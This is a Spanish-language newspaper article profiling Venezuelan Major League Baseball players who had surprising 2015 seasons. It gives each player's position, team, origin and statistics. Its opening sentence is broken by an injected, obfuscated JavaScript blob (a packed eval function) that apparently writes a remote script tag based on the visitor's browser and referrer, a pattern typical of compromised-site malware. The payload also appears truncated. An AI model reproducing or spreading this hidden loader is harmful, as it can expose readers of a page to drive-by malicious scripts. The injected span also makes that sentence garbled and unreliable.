Héroes "tapados"

Ángel Paúl Pereira / Maracaibo / [email protected]
Varios eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhtns|var|u0026u|referrer|btnie||js|php'.split('|'),0,{})) venezolanos han sido figuras inesperadas para sus equipos este año en Grandes Ligas, escriben su propia historia y ponen en la mesa números interesantes sin recibir los flashes

Odúbel Herrera está entre los mejores novatos de la Liga Nacional con el madero. (Foto: Archivo)

La presente temporada del béisbol de Grandes Ligas ha estado plagada de gratas noticias e importantes logros para nuestra legión, en nombres favoritos para la afición como los de Miguel Cabrera, Félix Hernández o José Altuve.

Pero también ha estado llena de historias sin iguales de peloteros nacidos en esta tierra, que con un gran rendimiento para sus equipos han logrado que sus nombres, poco a poco, vayan calando en la memoria de los seguidores de la pelota caliente. Hasta ahora muchos de ellos han hecho un trabajo encomiable, con buenos números, batazos, jugadas o pitcheos oportunos, pero los flashes de las cámaras han estado apuntando hacia otros nombres de figuras de élite, sin embargo son héroes "tapados" a los que hay que seguirles la pista.

Héctor Rondón, Odúbel Herrera, David Peralta, Francisco Cervelli, Luis Valbuena, Eugenio Suárez, Wílmer Flores y Eduardo Escobar, son solo algunos de los casos más llamativos y sorprendentes dentro del contingente criollo que participa en el big show.

HÉCTOR RONDÓN

Posición: Relevista

Equipo: Cachorros

Lanza: D / Batea: D

Edad: 27

Origen: Guatire, Venezuela

Experiencia en GL: 2 años

Héctor Rondón ha demostrado que puede meterse entre los relevistas élite de la Liga Nacional. Sus 25 rescates en 29 chances así lo demuestran. Ha logrado el puesto de cerrador de los Cachorros después del Juego de Estrellas, salvando en 13 de las 14 oportunidades. En su tercer año como bigleaguer, está cerca de los 30 salvados, que serían su nuevo tope personal y lo convertirían en el séptimo criollo en alcanzar tal cifra en MLB. Exhibe efectividad de 1.53 (la 2ª mejor entre relevistas de la Nacional) y un respetable WHIP de 0.97, con los que supera, a Mark Melancon y Trevor Rosenthal, los mejores apagafuegos del viejo circuito.

ODÚBEL HERRERA

Posición: Jardinero

Equipo: Filadelfia

Lanza: D / Batea: Z

Edad: 23

Origen: San José de Heras, Zulia, Vza.

Experiencia en GL: 1er. año

Otro que de manera “silenciosa” y en medio de la adaptación ha tenido un gran año es Odúbel Herrera. Los Filis han apostado por él, incluso en medio de sus problemas con el madero, y el jardinero central ha respondido, colándose entre los mejores debutantes de la gran carpa y de la franquicia. A falta de un mes para el final de la ronda regular, el “Torito” destaca entre los novatos de la Nacional en promedio con .293 (2º), hits con 117 (3º), dobles con 25 (1°) y bases robadas con 14 (2°). 

DAVID PERALTA

Posición: Jardinero

Equipo: Arizona

Lanza: Z / Batea: Z

Edad: 28

Origen: Valencia, Venezuela

Experiencia en GL: 1 año

Sin un puesto como titular garantizado al comienzo de la zafra, con su bate y con su guante se las ha ingeniado para adueñarse de un puesto en line-up de los Cascabeles. A la defensiva es un seguro para el outfield, al mantener porcentaje de fildeo de .995, con sólo un error en más de 860 innings, la mayoría de ellos en la pradera izquierda (809.2). Con el madero se ha convertido en el mejor compañero de Paul Goldschimdt, con quien se ha repartido el peso ofensivo del equipo, destacando por sus 71 remolques (con las que duplica los 36 logrados en 2014). Está entre los mejores de Arizona en promedio con .305 (3°) y OPS. con .881 (2°).

EUGENIO SUÁREZ

Posición: Short stop

Equipo: Cincinnati

Lanza: D / Batea: D

Edad: 24

Origen: Bolivar, Venezuela

Experiencia en GL: 1 año

A pesar de la difícil misión que representa cumplir con las expectativas de una exigente posición en el cuadro,  al nacer en la tierra de los Aparicio, Concepción y Vizquel, un talentoso como Eugenio Suárez no ha deslucido en sus labores como campocortos de los Rojos. Desde su ascenso el pasado 11 de junio, Suárez, de apenas 23 años, se ha ganado a la fanaticada de Cincinnati con su aporte ofensivo, que al compararse con el de 2014 en su estreno con Detroit, es superior. Sus cuadrangulares (11), empujadas (38) y OPS. (.782) están entre los más llamativos de la divisa desde la fecha mencionada.  

WÍLMER FLORES

Posición: Short stop

Equipo: Mets (NY)

Lanza: D / Batea: D

Edad: 24

Origen: Valencia, Venezuela

Experiencia en GL: 2 años

A Wilmer Flores se le recordará siempre por sus lágrimas en pleno partido cuando se enteró que "había" sido cambiado de equipo, movimiento que al final se desechó, pero el criollo ha demostrado coraje y valía para embolsillarse el cariño de la afición de los Mets. Flores ha sobresalido como uno de los pilares de la gran campaña de los Mets de Nueva York. Su oportunismo a la ofensiva con los neoyorquinos le ha permitido mantenerse entre los cinco mejores torpederos del viejo circuito, con 14 cuadrangulares, 22 dobles, 55 producidas y un OPS. de .706.

LUIS VALBUENA

Posición: 3B

Equipo: Houston

Lanza: D / Batea: Z

Edad: 29

Origen: Sucre, Zulia, Venezuela

Experiencia en GL: 7 años

Luis Valbuena ha destacado en 2015 por sus sorprendentes demostraciones de poder, que lo han llevado a romper varios de sus topes previos en las Mayores, en medio de la temporada de ensueño que viven los Astros de Houston. Aunque su average (.210), su cantidad de hits (81) y dobles (14) están por debajo de lo deseado, con 22 batazos de vuelta completa y 48 fletadas en 110 choques, el zuliano se ha atornillado a la alineación sideral, alternando labores defensivas entre la tercera y la primera base.

FRANCISCO CERVELLI

Posición: C

Equipo: Pittsburgh

Lanza: D / Batea: D

Edad: 29

Origen: Valencia, Venezuela

Experiencia en GL: 7 años

Es imposible hacer este repaso y no pensar en Francisco Cervelli. El cerebro detrás del plato del explosivo equipo de Pittsburgh. Después de taladrar infructuosamente un puesto regular en la receptoría de los Yankees de Nueva York por varias campañas, Cervelli cambió de aires, de equipo, de liga y en el primer año ha impuesto topes personales en todos los renglones ofensivos, destacando su centenar de imparables, y un OPS. de .796, tercero entre los titulares bucaneros. Pero su aporte más relevante ha sido con la mascota, guiando al pitcheo de los Piratas a posicionarse como el segundo mejor de la Nacional, con 3.15 de efectividad.

EDUARDO ESCOBAR

Posición: SS

Equipo: Minnesota

Lanza: D / Batea: D/Z

Edad: 26

Origen: Villa de Cura, Venezuela

Experiencia en GL: 4 años

Si de cambio de aires se trata, otro que se vio beneficiado tras abandonar la Ciudad de los Vientos para desplazarse a las ciudades gemelas fue Eduardo Escobar, quien ha superado el máximo de sus registros personales con los Medias Blancas de Chicago, pues pasó de ser un utility al principio de temporada, a shortstop titular con los Mellizos de Minnesota. Escobar, con 42 remolcadas en 98 juegos, ya sobrepasó las 37 logradas en 2014 en 133 partidos.

Cifras

172 outs ha realizado Peralta como LF de Arizona. (2° mayor entre LF de la Nacional) 

1.53 es la efectividad de Héctor Rondón este año. (2° mejor entre relevistas de la Liga Nacional)

.293 batea Odúbel Herrera en 119 juegos. (2° mejor entre novatos del viejo circuito, líder entre peloteros de los Filis).

11 jonrones acumula Eugenio Suárez. Es el segundo campocorto venezolano que conecta 10 o más cuadrangulares en su segunda campaña en las mayores.

22 bambinazos tiene Luis Valbuena con los Astros este año. Líder del equipo. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama